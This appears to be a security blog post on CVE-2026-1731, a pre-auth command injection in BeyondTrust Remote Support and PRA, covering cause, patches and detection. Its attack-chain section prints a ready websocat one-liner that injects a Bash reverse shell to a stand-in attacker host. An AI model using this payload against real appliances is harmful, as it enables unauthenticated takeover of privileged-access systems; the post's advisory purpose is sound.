1. Home
    2.  » 
  2. Posts
    3.  » 

BeyondTrust Gets Hit Again: Pre-Auth RCE in Remote Support Tools

#security
#cve
#beyondtrust
#remote-access
#command-injection
#CVE-2026-1731

BeyondTrust Remote Support and Privileged Remote Access have a critical pre-authentication RCE bug. No login needed, no user interaction, just send a crafted WebSocket request and you’re executing OS commands as the site user.

This is CVE-2026-1731. CVSS 9.9. And it’s in the exact same endpoint that got exploited by Chinese state actors three months ago.

What Happened

The vulnerability is a command injection in the thin-scc-wrapper script. This script handles WebSocket connections at /nw and reads a version number from the client. The problem? That version number gets used in a Bash arithmetic comparison without proper validation.

When Bash evaluates something like [[ "$localVersion" -lt "$remoteVersion" ]], it treats the operands as arithmetic expressions. An attacker can send a malicious version number like a[$(command)] and Bash will execute whatever’s in that subshell.

Attack Chain

The exploit is straightforward. Connect to the WebSocket endpoint at /nw with the protocol header ingredi support desk customer thin. Send four newline-delimited values: a malicious version number, a UUID for the cookie, an auth type, and a gskey.

The version number is where the injection happens. Format it as a[$(your_command)] and that command runs when the script hits the arithmetic comparison.

Example uses a Bash reverse shell:

echo -ne "hax[\$(/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | websocat -k wss://target:443/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: company_name" --binary -n -

Commands execute in the context of the site user. Full system access follows.

Who Should Care

Anyone running BeyondTrust Remote Support or Privileged Remote Access on-premises. SaaS customers got auto-patched on February 2nd.

There are roughly 8,500 internet-facing on-prem instances that could be vulnerable. BeyondTrust has 20,000+ customers including 75% of the Fortune 100. These tools are deployed in environments that handle privileged access to critical systems.

The attack requires no authentication, no user interaction, and there’s a public PoC. If you’re running an affected version and haven’t patched, you’re exposed.

Why This Happened

This is a Bash arithmetic evaluation bug. The code uses comparison operators like -lt inside [[ ]] without validating that the operands are actually numbers. Bash treats those operands as expressions and evaluates them.

It’s a subtle gotcha. Most developers know to sanitize shell input, but arithmetic evaluation is less obvious. You see what looks like a safe numeric comparison and miss that Bash will execute code embedded in the “number.”

What makes this worse? It’s in the same endpoint as CVE-2024-12356, which Chinese state actors exploited to breach the US Treasury in December. BeyondTrust fixed that bug, but missed this variant sitting right next to it.

The researchers who found this used AI-enabled variant analysis. They discovered it one day after watchTowr published analysis of a similar Bash arithmetic bug in Ivanti EPMM. Pattern recognition at work.

What to Do

Update immediately.

For self-hosted Remote Support:

  1. Log into the appliance interface
  2. Navigate to /appliance
  3. Apply patch BT26-02-RS

For self-hosted Privileged Remote Access:

  1. Log into the appliance interface
  2. Navigate to /appliance
  3. Apply patch BT26-02-PRA
  4. Or upgrade to version 25.1.1 or later

If you’re on Remote Support older than 21.3 or PRA older than 22.1, you need to upgrade to a newer base version first before you can apply the patch.

SaaS customers don’t need to do anything. You were patched on February 2nd.

While you’re patching, review your network segmentation. These tools shouldn’t be directly exposed to the internet. Put them behind a VPN or access control that requires authentication before you even reach the vulnerable endpoint. That doesn’t fix the bug, but it reduces your attack surface until you can patch.

Quick Reference

ItemDetails
CVE IDCVE-2026-1731
CVSS Score9.9 (v4), 9.8 (v3)
Authentication RequiredNone
User Interaction RequiredNone
Attack ComplexityLow
Products AffectedRemote Support 25.3.1 and earlier, PRA 24.3.4 and earlier
Fixed VersionsRS: Patch BT26-02-RS, PRA 25.1.1+
Public PoCYes
Active ExploitationNot reported as of Feb 12, 2026
Patch AvailabilityYes (BT26-02-RS, BT26-02-PRA)

FAQ

Q: Is this being exploited in the wild?
A: Not as of February 12, 2026. BeyondTrust and security researchers report no active exploitation. But there’s a public PoC and it’s easy to exploit, so assume that window is closing fast.

Q: How is this different from CVE-2024-12356?
A: Different vulnerability, same endpoint. CVE-2024-12356 was exploited as a zero-day by Chinese state actors. CVE-2026-1731 was found through responsible disclosure and patched before exploitation. But both allow pre-auth RCE through the same WebSocket handler.

Q: Do I need to upgrade or can I just patch?
A: You can patch if you’re on RS 21.3+ or PRA 22.1+. Older versions need to upgrade to a supported base version first.

Q: What privileges does the attacker get?
A: Commands execute in the context of the site user. That’s typically a privileged account with access to the system and potentially to connected endpoints.

Q: Can I detect exploitation attempts?
A: Look for WebSocket connections to /nw with unusual version numbers in the protocol handshake. Connections with non-numeric version values or values containing shell metacharacters are suspicious. Monitor for unexpected child processes spawned by the thin-scc-wrapper script.

Q: I’m on SaaS. Am I affected?
A: No. SaaS instances were automatically patched on February 2, 2026. This only affects self-hosted deployments that haven’t applied the patch.

Why This Matters

BeyondTrust tools are high-value targets. They provide privileged access to critical systems across enterprise networks. When they get compromised, attackers land directly in the keys to the kingdom.

This is the second major pre-auth RCE in these products in three months. The first was exploited to breach the US Treasury. The fact that this new bug is in the same endpoint suggests the fix for CVE-2024-12356 wasn’t comprehensive enough.

Variant analysis is finding these bugs. Researchers are using pattern matching to identify similar vulnerabilities across different codebases. The Ivanti bug that used Bash arithmetic evaluation got published, and a day later this BeyondTrust bug was discovered using the same technique.

If you’re maintaining code that does shell arithmetic with user input, audit it now. This isn’t just a BeyondTrust problem. It’s a pattern, and attackers are learning to look for it.

Bottom Line

CVE-2026-1731 is a critical pre-auth RCE in widely deployed enterprise tools. No authentication, no user interaction, straightforward exploitation, public PoC. If you’re running on-prem Remote Support or PRA, patch immediately. SaaS customers are already covered.

Don’t wait for exploitation to be reported. The Chinese actors who hit CVE-2024-12356 demonstrated these tools are strategic targets. Update today.

References

You Might Like:

Frigate NVR Command Injection Bug Allowed Admin-Level RCE (CVE-2026-25643)
Frigate has long been positioned as a privacy-first, self-hosted camera solution. However, …
Microsoft's Notepad Got Pwned (They Added AI To It, So...)
Remember when Notepad was just… Notepad? A simple text editor nobody asked to be modernized? …
Colorado's SB26-051 Would Require Your Operating System to Collect Your Age
Colorado is considering a bill that would require your operating system to ask your age before you …